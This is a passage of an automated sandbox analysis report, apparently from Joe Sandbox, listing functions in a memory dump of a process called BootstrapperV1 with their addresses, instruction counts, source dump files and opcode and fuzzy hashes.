                                                                                                                                                                                                                                              Function 00007FFB4B0ED955 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: b0ec406cee32c212a635a5e46de9e143135112f0bcde768c8f97511ec8479bab
                                                                                                                                                                                                                                              • Instruction ID: df1fa1a874d3685d979ad280a2ede0601dcf9b9c3a0657521311f0376116bd0d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b0ec406cee32c212a635a5e46de9e143135112f0bcde768c8f97511ec8479bab
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B31D16150EBC98FC717EF38C8A49A1BFA1EF5721430982EAD089CB1A3D915E806C750
                                                                                                                                                                                                                                              Function 00007FFB4B0FC7E8 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 29c47d745acad18abf1481c6c1c80c891db77b7dfdf2601cc3210ed46d23124e
                                                                                                                                                                                                                                              • Instruction ID: 0655ad9f3ea8803d031d89c6a0ca60a3cd2f65761d56865da32335585f0d6cb5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 29c47d745acad18abf1481c6c1c80c891db77b7dfdf2601cc3210ed46d23124e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F021A17191CB489BEB14EE18DC4A9E9BBE4FB99711F00012FE949D3250DA61F9458BC2
                                                                                                                                                                                                                                              Function 00007FFB4B0E7080 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: c3b92555e8d35105ef17e32b0bbb35d48f66526a8871f8f4c87c1699540c348d
                                                                                                                                                                                                                                              • Instruction ID: dda5ca598c94df06c0d1b459b4e0031130f6357e132ae1959574e9cc804e1ef6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3b92555e8d35105ef17e32b0bbb35d48f66526a8871f8f4c87c1699540c348d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC21907191CB489BEB14AE18DC4A9E9B7E4FB99721F00012FE84AE3250DA61F94587C2
                                                                                                                                                                                                                                              Function 00007FFB4B0F6262 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: bfb83ffc803ec4ece0cee384b7d9e28e48132103aa5023d440142a929e4ddae2
                                                                                                                                                                                                                                              • Instruction ID: 4568cdd5b9473e21e889692a7b3b4f9e65c9c81e20c912491c0334d8f6845f6d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfb83ffc803ec4ece0cee384b7d9e28e48132103aa5023d440142a929e4ddae2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D521C9B2B0CA494FE798BE2CE4461B977D1EF99222F14027FD14DC32A2DD25B8178645
                                                                                                                                                                                                                                              Function 00007FFB4B0E7040 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 9544f1dcf0bca3fbbb8daf93a21777c49eccbc1b61c81917d3dba87c26216307
                                                                                                                                                                                                                                              • Instruction ID: 643797051a20c3e82d301ab1a19d17c6256cd2ac80db9510f7667e9d6389f064
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9544f1dcf0bca3fbbb8daf93a21777c49eccbc1b61c81917d3dba87c26216307
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67217B7160CA1C9FEF68EF18D506AF937E1EB99721F10427AE50AD3361D961BC5287C0
                                                                                                                                                                                                                                              Function 00007FFB4B0E56A8 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 0b124f42d71d620e598329a72df00c7feefe9a019367961b4c591cafd75d50c6
                                                                                                                                                                                                                                              • Instruction ID: f8c1918140472e67a713a21d27bac4ab679ea6082daafe5fcf225eacf9c43736
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b124f42d71d620e598329a72df00c7feefe9a019367961b4c591cafd75d50c6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC113661A1EF8A4FD786FB3CE4502E677E1EF92215B0885F7C049CB197ED18E8468384
                                                                                                                                                                                                                                              Function 00007FFB4B0EDC31 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 94ef4a236263c5d5ef0478e987bdd976e785acb1ea2a252e9e4cecc9abe3d9c8
                                                                                                                                                                                                                                              • Instruction ID: 711d065ca41b082b7c6f9e89e7b8a42da646b066d17de9a7b4f9d54cdda4cc64
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94ef4a236263c5d5ef0478e987bdd976e785acb1ea2a252e9e4cecc9abe3d9c8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B117AA2B0DE4A1FE3D49E7C6CA91622AC0EF9828270541FBE54CC73B2D984CC018340
                                                                                                                                                                                                                                              Function 00007FFB4B0E6A46 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: bede7954c6f17f5be7384a7b1d4d4ca46881951f3081659a9098986ba7b23f02
                                                                                                                                                                                                                                              • Instruction ID: 12a97a0bb0aebfa64c94a6e400939e4b7d44e867d425decff47a1d393ba429e9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bede7954c6f17f5be7384a7b1d4d4ca46881951f3081659a9098986ba7b23f02
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F22137A290CECA1FE386AB7898941E4BBE1EF6634170841FBC089C32A2DD596806C740
                                                                                                                                                                                                                                              Function 00007FFB4B0EDC50 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: e625e597ced4e590e79cddd9cc8f8ea2474cfc209fec593e772a401e1d03d684
                                                                                                                                                                                                                                              • Instruction ID: 8ad175dbe2d8d8fa9b7116a77aa3d922e8e3db6a7981230eeac9d3d075d29a98
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e625e597ced4e590e79cddd9cc8f8ea2474cfc209fec593e772a401e1d03d684
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B114862B0ED0E2BE3D49DBDBC951762AC1DF9929670542BBFA0CC73B1DC998C418380
                                                                                                                                                                                                                                              Function 00007FFB4B0FE939 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 04f78493baa2a9df31d7216ad8926fe6876e91be846d6b5ef55e19af21cc2931
                                                                                                                                                                                                                                              • Instruction ID: 3da0a733fee954ae8312528bb1bf8faae177aeefb104800516b87375dfe02be7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04f78493baa2a9df31d7216ad8926fe6876e91be846d6b5ef55e19af21cc2931
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 141108B2E0CA8D4FEB90FEB899115E97BE0FF85301F04026BE54CD7292EE645D058392
                                                                                                                                                                                                                                              Function 00007FFB4B0ECC05 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: cad4fd6b223b4194ed64ab42862c32b84ddb8b9ac674324f65bce99879223ade
                                                                                                                                                                                                                                              • Instruction ID: bd0979e45b59e004b993cb457ee53ee8f2aa1a46ae1c6b8cb293280c9dc496c4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cad4fd6b223b4194ed64ab42862c32b84ddb8b9ac674324f65bce99879223ade
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB110861B0CA881FD795EF3CC899A667BE1DF9A20270881FAE44DCB267CC14AC05C351
                                                                                                                                                                                                                                              Function 00007FFB4B0F4B88 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 69ead66dfc793380dfa80c945a6bf6df92e796482df236e5cf42155be2e70bfc
                                                                                                                                                                                                                                              • Instruction ID: 35ea41a7dcf486d817eb2c9659e4e9aac6d7f4b628089841250d1a508a204af8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69ead66dfc793380dfa80c945a6bf6df92e796482df236e5cf42155be2e70bfc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC11905160E7D94FD757DB3C88656683FB0AF07251B0A81EBD8C9CB1E3D6084C09C3A2
                                                                                                                                                                                                                                              Function 00007FFB4B0FEF79 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: d6eed33536adb99a753f197379392acf1c79b2f0f05c2fcd44677ba63c01b723
                                                                                                                                                                                                                                              • Instruction ID: fab84eed22017d6dee4cbbf5d3c65fd201cd477eab99f228e7394dd78d8112f4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6eed33536adb99a753f197379392acf1c79b2f0f05c2fcd44677ba63c01b723
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8121B19150E3C61FE713AFB88DA65957FA09F13260F4849EEC1C88F2F3E509541AC302
                                                                                                                                                                                                                                              Function 00007FFB4B0FE971 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 62e04de6e580b5070f33525e3478ce396907376aa39d28acd1a3917f62692285
                                                                                                                                                                                                                                              • Instruction ID: d5b552f034e413b461030984cca3e6cd8b685ff61203553854b0bbd3663c35a4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62e04de6e580b5070f33525e3478ce396907376aa39d28acd1a3917f62692285
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D1129A1D5C5881FEB90AB7499124EA7FE4EF45311B4442ABE048D76E3DD581A0583A2
                                                                                                                                                                                                                                              Function 00007FFB4B0E08E6 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: be3a79e3b44de4c2adc6c665fea9ba85e107aa4871e41b7d4710d68c116dfb12
                                                                                                                                                                                                                                              • Instruction ID: 9e86474c90191b35b88640cca009dd2f782d0b1dd6d8aa281c1f46d8d941740c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be3a79e3b44de4c2adc6c665fea9ba85e107aa4871e41b7d4710d68c116dfb12
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6911256150D6DD0FE725ABB8886A7FABFD0DF4A301F0405FAD4CCC72A3E928141A8781
                                                                                                                                                                                                                                              Function 00007FFB4B0E6108 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: ee5eb546db4ee73418e44084ef7d9786570a6a2c8dc96e842b3c2ffa3d59399c
                                                                                                                                                                                                                                              • Instruction ID: 11f23b4213d20688fcaf86b1903519e0f510f6ad4bb9ee4e48767336b6adf727
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee5eb546db4ee73418e44084ef7d9786570a6a2c8dc96e842b3c2ffa3d59399c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30017B83D0DADE1EE3E1A93CD9540651AC0EF89261F1C49F6C188C2296ED0C2C418391
                                                                                                                                                                                                                                              Function 00007FFB4B0EEAB9 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 34f73e02913bb273496a39b7208150829b07729682ccbe50147056b419e653d5
                                                                                                                                                                                                                                              • Instruction ID: 4b0a432ba3db112ffb03f87fc220c94a51cf2652b05827231aa768d105ac6628
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34f73e02913bb273496a39b7208150829b07729682ccbe50147056b419e653d5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F20196A1D0E7CD5FE793AB7488690A5BFB0EF57201B0E45EBD488CB1A3D9192848C711
                                                                                                                                                                                                                                              Function 00007FFB4B0E09DD Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3574c2b92f4ff9db3bc3419e4a84a72e65f5f257cf3808d71ffde902f6bf2fef
                                                                                                                                                                                                                                              • Instruction ID: 97a8ee962ea7146a6e4b06a8a8c01f01706ec6bd781b54b174a87606efc3928e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3574c2b92f4ff9db3bc3419e4a84a72e65f5f257cf3808d71ffde902f6bf2fef
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D811E79080E6CE1FE756EFB448666E9FFE09F47250B4844EDC0D88B6A3E624180BD710
                                                                                                                                                                                                                                              Function 00007FFB4B0E4E48 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 4d8300f72a77c13d11cef4f08b1e81cf8e38d3aefd2fd735166ccf1d00a646eb
                                                                                                                                                                                                                                              • Instruction ID: c0ad8e0ef878e711c288dcef8861febe305047dd930f2669a88562f8cb97a090
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d8300f72a77c13d11cef4f08b1e81cf8e38d3aefd2fd735166ccf1d00a646eb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E01A2B1B1C90D1FDA94EA2CE44577663C5EB98322F4045BAE54CD3362DD24EC018390
                                                                                                                                                                                                                                              Function 00007FFB4B0FF289 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: de32d688502256dfb8df778c6b37545cb887bab94ee1780bc11b3aa217b48837
                                                                                                                                                                                                                                              • Instruction ID: efb0db1df0804617914b72c3f97d167a9687775d758d67b4a34d563fb7cb106c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de32d688502256dfb8df778c6b37545cb887bab94ee1780bc11b3aa217b48837
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4701FC71A0D5850FE345A738E8526E17BD1DF86320F0981FAE18CC72E3D99D58438351
                                                                                                                                                                                                                                              Function 00007FFB4B0E6BB0 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 9d291cc1b36601d860fbbb5a6324d8d51081b39fc0018d37cfe8bf22aec9892d
                                                                                                                                                                                                                                              • Instruction ID: 092ff451213df5764f7baa70e4b610a34bdbce635e3f42282ad532afc9bdfc2c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d291cc1b36601d860fbbb5a6324d8d51081b39fc0018d37cfe8bf22aec9892d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7301A261A2CD0F4B9A99FE3CE4546B6B2D1FF98311B44857AD44DC329AED28E8828340
                                                                                                                                                                                                                                              Function 00007FFB4B0E56F0 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: fb14c768dd2315c657c1b620b1ee1b5f9ddc4bd6f4e6255f7106c8ac9b443e70
                                                                                                                                                                                                                                              • Instruction ID: f0fa5d360e31be4da572d3b357b0a4aef38862a4cc950595f998e4a517c1fded
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb14c768dd2315c657c1b620b1ee1b5f9ddc4bd6f4e6255f7106c8ac9b443e70
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD01A261A28D0F8BDA99FB3CD0506B773D1FFE8300744897AD44DC7259ED28E8428780
                                                                                                                                                                                                                                              Function 00007FFB4B0EBCD8 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 45ed213dbab094328ec1c7c2c0ff8e493e9f615c5069f01a9b89d1f8b30a11bd
                                                                                                                                                                                                                                              • Instruction ID: e2ff504ba0f58e154ecf7a46b3beb6670b53c38d3c195abe4d0c8ec3665f61b6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45ed213dbab094328ec1c7c2c0ff8e493e9f615c5069f01a9b89d1f8b30a11bd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BF04CA6B1CD4A0FA7D9FA3CA09513553C5DBEC266B14407BC58DC3365EC14DC424340
                                                                                                                                                                                                                                              Function 00007FFB4B0E59A3 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                              Download Yara Rule
